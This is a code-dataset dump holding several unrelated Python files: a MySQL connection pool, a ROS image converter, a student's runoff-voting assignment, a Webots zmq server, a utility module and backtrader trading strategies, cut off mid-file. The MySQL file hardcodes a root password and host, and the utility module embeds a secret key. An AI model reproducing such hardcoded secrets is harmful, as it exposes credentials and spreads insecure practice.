(ex[0]-ex[0].min())/(ex[0].max()-ex[0].min())\nex.columns = ['input','standardization', 'normalization']\nprint(ex)","repo_name":"ChocolatePadmanaban/Learning_python","sub_path":"Day16/part7.py","file_name":"part7.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73463575440","text":"# coding=utf-8\r\n\r\nimport pymysql\r\nimport queue\r\nfrom k8s import settings\r\nimport logging\r\nlogger = logging.getLogger('sourceDns.webdns.views')\r\n\r\n\r\nREQUIRED_PARAMS = [\"host\", \"user\", \"passwd\", \"db\"]\r\nDB_CONNET = {'host': '192.168.3.105',\r\n 'port': 3306,\r\n 'user': 'root',\r\n 'passwd': 'rrjc2018',\r\n 'db': 'kubernetes'}\r\n\r\n\r\nclass ConnectionPool():\r\n\r\n def __init__(self, maxsize=10, **kwargs):\r\n self.kwargs = DB_CONNET\r\n\r\n self._queue = queue.Queue(maxsize=maxsize)\r\n\r\n for i in range(maxsize):\r\n self._queue.put(self._create())\r\n\r\n def _create(self):\r\n for param in REQUIRED_PARAMS:\r\n if self.kwargs.get(param, None) is None:\r\n raise Exception(\r\n \"Instantiation failed, '{0}' param is not found.\".format(\r\n param\r\n )\r\n )\r\n\r\n return pymysql.connect(**DB_CONNET, cursorclass=pymysql.cursors.DictCursor)\r\n\r\n def _put(self, conn):\r\n self._queue.put(conn)\r\n\r\n def _get(self):\r\n conn = self._queue.get()\r\n if conn is None:\r\n return self._create()\r\n\r\n return conn\r\n\r\n def execute(self, sql, args=None, exec_many=False, return_one=False):\r\n \"\"\"\r\n 执行 sql 操作\r\n :param sql: sql 语句\r\n :param args: 对应参数\r\n :param exec_many: 是否开启 `cur.executemany(sql, args)`\r\n :param return_one: 是否开启 `cur.fetchone()`\r\n \"\"\"\r\n conn = self._get()\r\n try:\r\n with conn as cur:\r\n if exec_many:\r\n cur.executemany(sql, args)\r\n else:\r\n cur.execute(sql, args)\r\n return cur.fetchone() if return_one else cur.fetchall()\r\n\r\n except Exception as e:\r\n raise e\r\n\r\n finally:\r\n self._queue.put(conn)\r\n\r\n @property\r\n def size(self):\r\n return self._queue.qsize()\r\n\r\n def __del__(self):\r\n \"\"\"\r\n 确保每个链接实例最后都会被释放\r\n \"\"\"\r\n while not self._queue.empty():\r\n conn = self._queue.get_nowait()\r\n if conn:\r\n conn.close()\r\n\r\n# pool = ConnectionPool(\r\n# # maxsize=100, maxsize 非必须,用于指定最大连接数\r\n# host=\"192.168.3.105\",\r\n# port=3306,\r\n# user=\"root\",\r\n# passwd=\"rrjc2018\",\r\n# db=\"kubernetes\"\r\n# )\r\n","repo_name":"airring/k8s_install","sub_path":"script/pymysql.py","file_name":"pymysql.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"42399038291","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport rospy\nimport ros_numpy\nimport numpy as np\n\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import PointCloud2\n\nclass Pc2ToImage():\n def __init(self):\n self.pc2_topic = rospy.get_param(\"~input_pc2_topic\")\n self.image_topic = rospy.get_param(\"~output_image_topic\")\n\n # node\n self.sub_pc2 = rospy.Subscriber(self.pc2_topic, PointCloud2, self.pc2_callback, queue_size=1)\n self.pub_image = rospy.Publisher(self.image_topic, Image, queue_size=1)\n \n def pc2_callback(self, _pc2_msg):\n self.pub_image.publish(self.generate_image(_pc2_msg))\n\n # generate image from pc2\n def generate_image(self, pc2_msg):\n # picture size\n height = pc2_msg.height\n width = pc2_msg.width\n\n # convert\n array = np.zeros((height, width), dtype=np.float32)\n\n # save data to arrary\n pc2_original = ros_numpy.numpify(pc2_msg)\n array[:, :] = pc2_original['rgb']\n\n # convert color (html color -> rgb)\n data = array.view(np.uint8).reshape(array.shape + (4,))[..., :3]\n image = ros_numpy.msgify(Image, data, encoding='bgr8')\n return image\n\ndef main():\n rospy.init_node(\"pc2_to_image\")\n\n print(\"===== PointCloud2 to Image Convertor ======================\")\n pc2_to_image = Pc2ToImage()\n\n rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Shunmo17/ros-pc2_tools","sub_path":"scripts/pc2_to_image.py","file_name":"pc2_to_image.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43357676119","text":"# COMP 202 A3\n# Name: Yimei Yang\n# ID: 260898303\nimport math\nfrom single_winner import *\n\n################################################################################\n\ndef votes_needed_to_win(ballots, num_winners):\n '''\n >>> votes_needed_to_win([{'CPC':3, 'NDP':5}, {'NDP':2, 'CPC':4}, \\\n {'CPC':3, 'NDP':5}], 1)\n 2\n >>> votes_needed_to_win(['g']*20, 2)\n 7\n '''\n #get the total number of votes as the length of input\n total_num = len(ballots)\n #round down\n round_down = math.floor(total_num/(num_winners+1)+1)\n return round_down\n \n\n\ndef has_votes_needed(result, votes_needed):\n '''\n >>> has_votes_needed({'NDP': 4, 'LIBERAL': 3}, 4)\n True\n >>> has_votes_needed({}, 2)\n False\n >>> has_votes_needed({'LIBERAL': 2}, 3)\n True\n '''\n #if there are more than one candidates, compare their votes with votes_needed\n if(len(result) >1):\n Max = get_winner(result)\n return (result[Max] >= votes_needed)\n #if there is only one candidate, the candidate is the winner\n elif (len(result)==1):\n return True\n #if the input is empty, return false\n else:\n return False\n \n\n\n################################################################################\n\n\ndef eliminate_candidate(ballots, to_eliminate):\n '''\n >>> eliminate_candidate([['NDP', 'LIBERAL'], ['GREEN', 'NDP'], \\\n ['NDP', 'BLOC']], ['NDP', 'LIBERAL'])\n [[], ['GREEN'], ['BLOC']]\n >>> eliminate_candidate([['NDP', 'LIBERAL'], ['GREEN', 'NDP'], \\\n ['NDP', 'BLOC']], ['NDP', 'LIBERAL'])\n [[], ['GREEN'], ['BLOC']]\n '''\n element_need = []\n #loop through all elements in the input\n for index, element in enumerate(ballots):\n value_need = []\n #add elements that are not in the to_eliminate list\n for value in element:\n if value not in to_eliminate:\n value_need.append(value)\n element_need.append(value_need)\n return element_need\n\n################################################################################\n\n\ndef count_irv(ballots):\n '''\n >>> pr_dict(count_irv([['NDP'], ['GREEN', 'NDP', 'BLOC'], ['LIBERAL','NDP'],\\\n ['LIBERAL'], ['NDP', 'GREEN'], ['BLOC', 'GREEN', 'NDP'],\\\n ['BLOC', 'CPC'], ['LIBERAL', 'GREEN'], ['NDP']]))\n {'BLOC': 0, 'CPC': 0, 'GREEN': 0, 'LIBERAL': 3, 'NDP': 5}\n >>> pr_dict(count_irv([['GREEN'], ['LIBERAL', 'CPC'], \\\n ['BLOC', 'LIBERAL'],['GREEN'], ['CPC', 'LIBERAL']]))\n {'BLOC': 0, 'CPC': 0, 'GREEN': 2, 'LIBERAL': 3}\n >>> pr_dict(count_irv([['GREEN'], ['LIBERAL', 'GREEN'], \\\n ['GREEN', 'LIBERAL'], ['GREEN'], ['GREEN', 'LIBERAL']]))\n {'GREEN': 4, 'LIBERAL': 1}\n >>> pr_dict(count_irv([['NDP'], ['NDP'],\\\n ['LIBERAL', 'NDP'], ['LIBERAL'], ['NDP'],\\\n ['NDP'], ['LIBERAL'], ['NDP']]))\n {'LIBERAL': 3, 'NDP': 5}\n '''\n \n eliminate_list = []\n #loop until one candidate is the majority\n while (not has_votes_needed(count_first_choices(ballots),\\\n votes_needed_to_win\\\n (ballots, 1))):\n first_element_dict = count_first_choices(ballots)\n #get the last place candidate\n last_place_variable = [last_place(first_element_dict, seed=None)]\n #eliminate the last place candidate\n ballots = eliminate_candidate(ballots, last_place_variable)\n eliminate_list = eliminate_list + last_place_variable\n #get the updated first choice dictionary\n first_element_new = count_first_choices(ballots)\n \n be_eliminated = count_approval(eliminate_list)\n #add candidates that are eliminated to the dictionary\n for element in be_eliminated:\n be_eliminated[element] = 0\n\n result = add_dicts(be_eliminated, first_element_new)\n return result\n \n \n\n\n################################################################################\n\nif __name__ == '__main__':\n doctest.testmod()\n","repo_name":"YimeiYang/ProjectsClass","sub_path":"COMP 202/Assignment 3/instant_run_off.py","file_name":"instant_run_off.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38656282424","text":"#\n# Synchronized action\n#\nimport zmq\nimport numpy as np\nimport pickle\n\nimport sys\nimport os\nsys.path.append(os.path.abspath(\"/home/efx/Development/PHD/RL/deep-rl-biorob/webots_communication_toolbox/tools\"))\n\ntry:\n from simplerpc import WebotsCommunicatorService\nexcept ImportError as e:\n raise error.DependencyNotInstalled(\"{}. (HINT: you need to install Webots_py, and also perform the setup instructions here: https://gitlab.com/srill-fb99/deep-rl-biorob.)\".format(e))\n\n\n\ndef main():\n server = WebotsCommunicatorService(7,np.array([\n [ 0, 1],\n [ 0, 1]\n ]))\n\n # Now broadcast exactly 1M updates followed by END\n reset_model = False\n for i in range(10000):\n if ( i==1000 ):\n reset_model = True\n\n act = np.asarray(np.random.randn(8,1))\n server.step(act)\n\n if(reset_model == True):\n reset_model = False\n #print \"rec:obs {}:{}\".format(i,obs[2][0])\n\n server.syncservice.send(b'END')\n\nif __name__ == '__main__':\n main()\n","repo_name":"NikosKokkinis/deep-rl-webots","sub_path":"biorob-rl-communication-lib/examples/simpleRpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30723547813","text":"import base64\nimport functools\nimport inspect\nimport json\nimport warnings\nfrom collections import namedtuple\nfrom itertools import cycle\n\nContainerId = namedtuple(\"ContainerId\", \"inf_id, chat_id, msg_id\")\n\n\ndef xor_key_decrypt(data, key):\n data = base64.b64decode(data).decode(\"utf-8\")\n xored = ''.join(chr(ord(x) ^ ord(y)) for x, y in zip(data, cycle(key)))\n xored = base64.b64decode(xored.encode(\"utf-8\")).decode(\"utf-8\")\n return xored\n\n\ndef decrypt_id(data):\n MSG_SECRET = \"UNhdE39gf0VXG/r6fc8LWpqY\"\n res = xor_key_decrypt(data, MSG_SECRET)\n res = json.loads(res)\n return ContainerId(inf_id=res[\"i\"], chat_id=res[\"c\"], msg_id=res[\"m\"])\n\n\ndef deprecated(reason):\n \"\"\"\n This is a decorator which can be used to mark functions\n as deprecated. It will result in a warning being emitted\n when the function is used.\n \"\"\"\n\n if isinstance(reason, str):\n\n # The @deprecated is used with a 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated(\"please, use another function\")\n # def old_function(x, y):\n # pass\n\n def decorator(func1):\n\n if inspect.isclass(func1):\n fmt1 = \"Call to deprecated class {name} ({reason}).\"\n else:\n fmt1 = \"Call to deprecated function {name} ({reason}).\"\n\n @functools.wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt1.format(name=func1.__name__, reason=reason),\n category=DeprecationWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func1(*args, **kwargs)\n\n return new_func1\n\n return decorator\n\n elif inspect.isclass(reason) or inspect.isfunction(reason):\n\n # The @deprecated is used without any 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated\n # def old_function(x, y):\n # pass\n\n func2 = reason\n\n if inspect.isclass(func2):\n fmt2 = \"Call to deprecated class {name}.\"\n else:\n fmt2 = \"Call to deprecated function {name}.\"\n\n @functools.wraps(func2)\n def new_func2(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt2.format(name=func2.__name__),\n category=DeprecationWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func2(*args, **kwargs)\n\n return new_func2\n\n else:\n raise TypeError(repr(type(reason)))\n","repo_name":"sovaai/sova-ide-processor","sub_path":"nlab/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32716014761","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport backtrader as bt\nfrom BacktraderAPI import BTIndicator\nfrom .BTStrategyExit import *\nfrom .BTStrategyBase import *\nfrom .BTStrategyBuyType import *\nfrom .BTStrategyDebug import *\nfrom .Strategy import *\nimport math\nimport datetime\n\nclass EmptyStrategy(bt.Strategy):\n params = dict(period=2000)\n\n def __init__(self):\n bt.indicators.HurstExponent(period=self.p.period)\n pass\n\nclass KDJStrategy(StopTrailStrategyExit, KDJStrategyBase):\n def next(self):\n super(KDJStrategy, self).next()\n if self.position.size == 0:\n if self.kdj.percJ >= 150:\n self.buy()\n elif self.kdj.percJ <= -50:\n self.sell()\n elif self.position.size > 0:\n if (len(self) - self.holdstart) >= 6:\n if self.kdj.percJ >= 100:\n self.close()\n elif self.position.size < 0:\n if (len(self) - self.holdstart) >= 6:\n if self.kdj.percJ <= -100:\n self.close()\n\n\nclass ModifiedRSIStrategy(StopTrailStrategyExit):\n def __init__(self):\n super(ModifiedRSIStrategy, self).__init__()\n self.rsi = BTIndicator.modifiedRSI()\n self.rsiXUpper = bt.ind.CrossOver(self.rsi.modifiedRSI, 90)\n self.rsiXLower = bt.ind.CrossOver(self.rsi.modifiedRSI, 10)\n self.rsiX30 = bt.ind.CrossOver(self.rsi.modifiedRSI, 30)\n\n def next(self):\n super(ModifiedRSIStrategy, self).next()\n if self.position.size == 0:\n if self.rsiXLower == 1:\n self.buy()\n elif self.rsiXUpper == -1:\n self.sell()\n elif self.position.size > 0:\n if self.rsiXUpper == 1:\n self.close()\n elif self.position.size < 0:\n if self.rsiX30 == -1:\n self.close()\n\nclass AOStrategy(AwesomeOscillatorStrategyBase, StopTrailStrategyExit):\n def next(self):\n super(AOStrategy, self).next()\n if self.position.size == 0:\n if self.aoStreakXZero == 1:\n self.sell()\n elif self.aoStreakXZero == -1:\n self.buy()\n elif self.position.size > 0:\n if self.aoStreak.streak == -2:\n self.close()\n elif self.position.size < 0:\n if self.aoStreak.streak == 2:\n self.close()\n\nclass CzechStrategy(BBandsStrategyBase, VLIStrategyBase, StopTrailStrategyExit):\n def __init__(self):\n super(CzechStrategy, self).__init__()\n self.BBWcondition = bt.ind.SMA(self.bollWidth, period=10) > bt.ind.SMA(self.bollWidth, period=50)\n self.VOLcondition = bt.ind.SMA(self.data.volume, period=10) > bt.ind.SMA(self.data.volume, period=50)\n self.XOverBollTop = bt.ind.CrossOver(self.data, self.boll.top)\n self.XOverBollBot = bt.ind.CrossOver(self.data, self.boll.bot, plot=False)\n self.smaVeryFast = bt.ind.SMA(self.data, period=10)\n self.smaFast = bt.ind.SMA(self.data, period=20)\n self.smaMid = bt.ind.SMA(self.data, period=50)\n self.smaSlow = bt.ind.SMA(self.data, period=100)\n self.smaVerySlow = bt.ind.SMA(self.data, period=200)\n self.smaCrossDown = bt.ind.CrossDown(self.smaSlow, self.smaMid)\n self.waitingToShort = False\n\n def next(self):\n if self.position.size == 0:\n\n if self.XOverBollTop == -1 and self.VOLcondition:\n if self.data > self.smaFast:\n if not self.extremeVolatiliy:\n if not self.volatilityLevel:\n if self.smaMid > self.smaVerySlow:\n self.buy()\n elif not self.smaVerySlow > self.smaSlow > self.smaMid:\n self.buy()\n elif self.smaSlow > self.smaVerySlow:\n self.buy()\n #TODO: stop loss at low of last candle\n #TODO: if trade profit > 3%, add stop win at 1%\n elif self.XOverBollBot == 1:\n if self.bollWidth < self.vli.slow:\n self.waitingToShort = True\n\n # if self.waitingToShort:\n # if self.smaCrossDown: # wait for\n # if self.bollWidth < self.vli.top:\n # self.sell()\n # self.waitingToShort = False\n\n elif self.position.size > 0:\n if self.XOverBollBot == -1 and self.VOLcondition:\n self.close()\n elif self.position.size < 0:\n if self.XOverBollTop == 1 and self.VOLcondition:\n self.close()\n\nclass SICrossStrategy(ASIStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.siXZero == 1:\n self.buy()\n elif self.siXZero == -1:\n self.sell()\n elif self.position.size > 0:\n if self.siXZero == -1:\n self.sell()\n elif self.position.size < 0:\n if self.siXZero == 1:\n self.buy()\n\nclass KAMAXStrategy(KAMAStrategyBase, BBandsKChanSqueezeStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.squeeze.squeezePerc > self.p.squeezeThreshold:\n if self.kamaXsma == 1:\n self.buy()\n # elif self.siXZero == -1:\n # self.sell()\n elif self.position.size > 0:\n if self.kamaXsma == -1:\n self.sell()\n # elif self.position.size < 0:\n # if self.kamaXsma == 1:\n # self.buy()\n\nclass ClenowTrendFollowingStrategy(bt.Strategy):\n \"\"\"The trend following strategy from the book \"Following the trend\" by Andreas Clenow.\"\"\"\n alias = ('ClenowTrendFollowing',)\n\n params = (\n ('trend_filter_fast_period', 50),\n ('trend_filter_slow_period', 100),\n ('fast_donchian_channel_period', 25),\n ('slow_donchian_channel_period', 50),\n ('trailing_stop_atr_period', 100),\n ('trailing_stop_atr_count', 3),\n ('risk_factor', 0.002)\n )\n\n def __init__(self):\n self.trend_filter_fast = bt.indicators.EMA(period=self.params.trend_filter_fast_period)\n self.trend_filter_slow = bt.indicators.EMA(period=self.params.trend_filter_slow_period)\n self.dc_fast = BTIndicator.DonchianChannels(period=self.params.fast_donchian_channel_period)\n self.dc_slow = BTIndicator.DonchianChannels(period=self.params.slow_donchian_channel_period)\n self.atr = bt.indicators.ATR(period=self.params.trailing_stop_atr_period)\n self.order = None # the pending order\n # For trailing stop loss\n self.sl_order = None # trailing stop order\n self.sl_price = None\n self.max_price = None # track the highest price after opening long positions\n self.min_price = None # track the lowest price after opening short positions\n\n def next(self):\n # self.dc_slow.dcl <= self.dc_fast.dcl <= self.dc_fast.dch <= self.dc_slow.dch\n assert self.dc_slow.dcl <= self.dc_fast.dcl\n assert self.dc_fast.dcl <= self.dc_fast.dch\n assert self.dc_fast.dch <= self.dc_slow.dch\n\n if not self.position: # Entry rules\n assert self.position.size == 0\n\n # Position size rule\n max_loss = self.broker.get_cash() * self.p.risk_factor # cash you afford to loss\n position_size = max_loss / self.atr[0]\n\n if self.data.close > self.dc_slow.dch:\n if self.trend_filter_fast > self.trend_filter_slow: # trend filter\n if self.order:\n self.broker.cancel(self.order)\n else:\n # Entry rule 1\n self.order = self.buy(price=self.data.close[0], size=position_size, exectype=bt.Order.Limit)\n self.max_price = self.data.close[0]\n elif self.data.close < self.dc_slow.dcl:\n if self.trend_filter_fast < self.trend_filter_slow: # trend filter\n if self.order:\n self.broker.cancel(self.order)\n else:\n # Entry rule 2\n self.order = self.sell(price=self.data.close[0], size=position_size, exectype=bt.Order.Limit)\n self.min_price = self.data.close[0]\n else:\n assert self.position.size\n # assert self.order is None\n\n # Exit rules\n if self.position.size > 0:\n # Exit rule 1\n if self.data.close < self.dc_fast.dcl:\n self.order = self.order_target_value(target=0.0, exectype=bt.Order.Limit, price=self.data.close[0])\n return\n else:\n # Exit rule 2\n if self.data.close > self.dc_fast.dch:\n self.order = self.order_target_value(target=0.0, exectype=bt.Order.Limit, price=self.data.close[0])\n return\n\n # Trailing stop loss\n trail_amount = self.atr[0] * self.p.trailing_stop_atr_count\n if self.position.size > 0:\n self.max_price = self.data.close[0] if self.max_price is None else max(self.max_price,\n self.data.close[0])\n if self.sl_price is None or self.sl_price < self.max_price - trail_amount:\n self.sl_price = self.max_price - trail_amount # increase trailing price\n if self.sl_order:\n self.broker.cancel(self.sl_order)\n else:\n self.sl_order = self.order_target_value(target=0.0, exectype=bt.Order.Stop, price=self.sl_price)\n elif self.position.size < 0:\n self.min_price = self.data.close[0] if self.min_price is None else min(self.min_price,\n self.data.close[0])\n if self.sl_price is None or self.sl_price > self.min_price + trail_amount:\n self.sl_price = self.min_price + trail_amount # decrease trailing price\n if self.sl_order:\n self.broker.cancel(self.sl_order)\n else:\n self.sl_order = self.order_target_value(target=0.0, exectype=bt.Order.Stop, price=self.sl_price)\n\n\n#Trend Changing, Stochastic Strategy\n\nclass StochasticStrategy(bt.Strategy):\n\n '''\n https://tradingstrategyguides.com/best-stochastic-trading-strategy/\n\n Entry Criteria:\n\n 1. Check the daily chart and make sure the Stochastic indicator < 20 and the %K line crossed above %D line.\n 2. Move Down to the 15-Minute Time Frame and Wait for the Stochastic Indicator to hit the 20 level. %K line crossed above %D line.\n 3. Wait for the Stochastic %K line (blue moving average) to cross above the 20 level\n 4. Wait for a Swing Low Pattern to develop on the 15-Minute Chart\n 5. Entry Long When the Highest Point of the Swing Low Pattern is Broken to the Upside\n 6. Use Protective Stop Loss placed below the most recent 15-minute Swing Low\n 7. Take Profit at 2xSL\n\n - Long:\n -\n - Short:\n -\n\n\n Exit Criteria\n - Long/Short: Same as opposite\n '''\n\n params = (\n ('period', 14),\n ('period_dfast', 3),\n ('period_dslow', 3),\n ('upperband', 80.0),\n ('lowerband', 20.0),\n )\n\n def __init__(self):\n self.stochastic = bt.indicators.Stochastic(self.data,\n period=self.p.period,\n period_dfast=self.p.period_dfast,\n period_dslow=self.p.period_dslow,\n safediv=True\n )\n self.kCrosslower = bt.indicators.CrossOver(self.stochastic.l.percK,self.p.lowerband)\n self.kCrossupper = bt.indicators.CrossOver(self.stochastic.l.percK,self.p.upperband)\n self.kCrossD = bt.indicators.CrossOver(self.stochastic.l.percK,self.stochastic.l.percD)\n\n def next(self):\n if self.position.size == 0:\n if self.kCrosslower == 1 and self.kCrossD == 1:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n if self.kCrossupper == -1 and self.kCrossD == -1:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size > 0:\n if self.kCrossupper == -1 and self.kCrossD == -1:\n self.close(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size < 0:\n if self.kCrosslower == 1 and self.kCrossD == 1:\n self.close(exectype=bt.Order.Stop, price=self.data.close)\n\nclass ASOCrossStrategyWithSqueezePercCCI (ASOStrategyBase, BBandsKChanSqueezeStrategyBase, StochasticCCIStrategyBase, SMAStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.squeeze.squeezePerc > self.p.squeezeThreshold:\n if self.ashXLower == 1 :\n self.buy()\n elif self.ashXUpper == -1 :\n self.sell()\n elif self.position.size > 0:\n if self.ashXUpper == -1 :\n self.sell()\n elif self.position.size < 0 :\n if self.ashXLower == 1 :\n self.buy()\n\nclass CMOCrossStrategyWithSqueezePercCCI (StochasticCCIStrategyBase, BBandsKChanSqueezeStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.squeeze.squeezePerc > self.p.squeezeThreshold:\n if self.stochcciXUpperband == 1:\n self.buy()\n elif self.stochcciXLowerband == -1:\n self.sell()\n elif self.position.size > 0:\n if self.stochcciXUpperband == -1:\n self.sell()\n elif self.position.size < 0 :\n if self.stochcciXLowerband == 1:\n self.buy()\n\n\n#Channel Strategy\n\nclass KeltnerChannelStrategy(KeltnerChannelStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.cxKChanTop == 1:\n self.order = self.buy()\n\n elif self.cxKChanBot == -1:\n self.order = self.sell()\n\n\n elif self.position.size > 0:\n if self.cxKChanTop == -1:\n self.sell()\n\n elif self.position.size < 0:\n if self.cxKChanBot == 1:\n self.buy()\n\nclass ChandelierStrategy(bt.Strategy):\n params = dict(period=22, multip=3)\n\n def __init__(self):\n self.dataclose = self.datas[0].close\n\n self.chandelier = BTIndicator.ChandelierExit(period= self.p.period, multip = self.p.multip, subplot=False)\n self.chandelier.csv = True\n\n self.crossUpLong = bt.ind.CrossUp(self.dataclose, self.chandelier.long, subplot=False)\n self.crossUpShort = bt.ind.CrossUp(self.dataclose, self.chandelier.short, subplot=False)\n self.crossDownLong = bt.ind.CrossDown(self.dataclose, self.chandelier.long, subplot=False)\n self.crossDownShort = bt.ind.CrossDown(self.dataclose, self.chandelier.short, subplot=False)\n\n self.longGreaterThanShort = self.chandelier.long > self.chandelier.short\n self.shortGreaterThanLong = self.chandelier.short > self.chandelier.long\n\n self.closeHighest = bt.ind.And(self.dataclose > self.chandelier.long, self.dataclose > self.chandelier.short, subplot=False)\n self.closeLowest = bt.ind.And(self.dataclose < self.chandelier.short, self.dataclose < self.chandelier.long, subplot=False)\n # self.closeBetweenLongAndShort = bt.ind.Or(self.longCloseShort, self.shortCloseLong, subplot=False)\n # self.closeBetweenLongAndShort = (self.chandelier.long > self.dataclose and self.dataclose > self.chandelier.short) or (self.chandelier.short > self.dataclose, self.dataclose > self.chandelier.long)\n\n self.crossUp = bt.ind.Or(self.crossUpLong, self.crossUpShort, subplot=False)\n self.crossDown = bt.ind.Or(self.crossDownLong, self.crossDownShort, subplot=False)\n\n\n self.upperBand = bt.ind.Max(self.chandelier.long, self.chandelier.short)\n self.lowerBand = bt.ind.Min(self.chandelier.long, self.chandelier.short)\n self.crossUpperBand = bt.ind.CrossOver(self.dataclose, self.upperBand, subplot=False)\n self.crossLowerBand = bt.ind.CrossOver(self.dataclose, self.lowerBand, subplot=False)\n\n self.cross = bt.ind.CrossOver(self.chandelier.long, self.chandelier.short, subplot=False)\n\n\n def next(self):\n #entry option 1\n # if self.position.size == 0:\n # if self.closeBetweenLongAndShort == 0:\n # if self.crossUp:\n # self.buy()\n # elif self.crossDown:\n # self.sell()\n\n # entry option2\n if self.position.size == 0:\n if self.closeHighest:\n self.buy()\n elif self.closeLowest:\n self.sell()\n\n # entry option3\n # if self.position.size == 0:\n # if self.crossUpperBand == 1:\n # self.buy()\n # elif self.crossLowerBand == -1:\n # self.sell()\n\n #exit option1\n # elif self.position.size > 0:\n # if self.closeBetweenLongAndShort == 1 or self.crossDown == 1:\n # self.sell()\n # elif self.position.size < 0:\n # if self.closeBetweenLongAndShort == 1 or self.crossUp == 1:\n # self.buy()\n\n #exit option2\n # elif self.position.size != 0:\n # if self.closeBetweenLongAndShort == 1:\n # self.close()\n\n # exit option3\n elif self.position.size > 0:\n if self.crossUpperBand == -1:\n self.sell()\n elif self.position.size < 0:\n if self.crossLowerBand == 1:\n self.buy()\n\n # strategy:\n if self.position.size == 0:\n if self.cross == 1:\n self.buy()\n\n elif self.position.size != 0:\n if self.cross == -1:\n self.sell()\n\n\n#Strength of Trend Strategy\n\nclass AroonCrossStrategy(AroonStrategyBase,EMAStrategyBase):\n\n '''\n - Long:\n - close is above 200 EMA\n - Aroon Long touches upper & Short touches lower\n\n - Short:\n - close is below 200 EMA\n - Aroon Short touches upper & Long touches lower\n\n - Exit Criteria:\n - Long: Close Buy when Aroon Long crosses below Aroon Short below 50\n - Short: Close Sell when Aroon Short crosses below Aroon Long below 50\n '''\n\n def next(self):\n orders = self.broker.get_orders_open()\n\n if self.position.size == 0: # not in the market\n if self.data.close > self.ema:\n if self.aroonCross == 1 and self.aroon.aroondown < self.aroonMidBand:\n # if self.aroon.aroonup == self.p.aroonUpBand and self.aroon.aroondown == self.p.aroonLowBand:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n if self.data.close < self.ema:\n if self.aroonCross == -1 and self.aroon.aroonup < self.aroonMidBand:\n # if self.aroon.aroondown == self.p.aroonUpBand and self.aroon.aroonup == self.p.aroonLowBand:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size > 0: # longing in the market\n if self.aroonCross == -1 and self.aroon.aroonup < self.aroonMidBand:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size < 0: # shorting in the market\n if self.aroonCross == 1 and self.aroon.aroondown < self.aroonMidBand:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n\nclass DMICrossStrategy(DMIStrategyBase):\n\n '''\n Entry Critria:\n - Long:\n - +DI > -DI\n - ADX > Benchmark\n - Short:\n - +DI < -DI\n - ADX > Benchmark\n\n Exit Critria\n - Long/Short: Same as opposite\n '''\n\n def next(self):\n\n orders = self.broker.get_orders_open()\n\n if self.dmi.adx > self.p.adxBenchmark:\n\n if self.position.size == 0: # not in the market\n\n if self.plusDIXminusDI == 1:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n if self.plusDIXminusDI == -1:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size > 0: # longing in the market\n\n if self.plusDIXminusDI == -1:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size < 0: # shorting in the market\n\n if self.plusDIXminusDI == 1:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n\nclass IchimokuStrategy(IchimokuCloudStrategyBase, StopTrailStrategyExit, HoldStrategyExit, AwesomeOscillatorStrategyBase, PSARStrategyBase):\n def next(self):\n cloud = self.ichimoku.senkou_span_a - self.ichimoku.senkou_span_b\n tenkanGreaterKijun = self.ichimoku.tenkan_sen - self.ichimoku.kijun_sen\n if self.position.size == 0: # not in the market\n\n if tenkanGreaterKijun > 0:\n if (cloud > 0 and self.data > self.ichimoku.senkou_span_a) or (cloud < 0 and self.data > self.ichimoku.senkou_span_b):\n if self.tenkanXKijun == 1 or self.XSenkouB == 1:\n self.buy()\n\n elif tenkanGreaterKijun < 0:\n if (cloud > 0 and self.data < self.ichimoku.senkou_span_b) or (cloud < 0 and self.data < self.ichimoku.senkou_span_a):\n if self.tenkanXKijun == -1 or self.XSenkouB == -1:\n self.sell()\n\n elif self.position.size > 0:\n if (len(self) - self.holdstart) >= self.p.hold:\n if self.tenkanXKijun == -1:\n self.close()\n\n elif self.position.size < 0:\n if (len(self) - self.holdstart) >= self.p.hold:\n if self.tenkanXKijun == 1:\n self.close()\n\n super(IchimokuStrategy, self).next()\n\nclass IchimokuBracketStrategy(IchimokuCloudStrategyBase, BracketBuying, HoldStrategyExit, CCIStrategyBase, 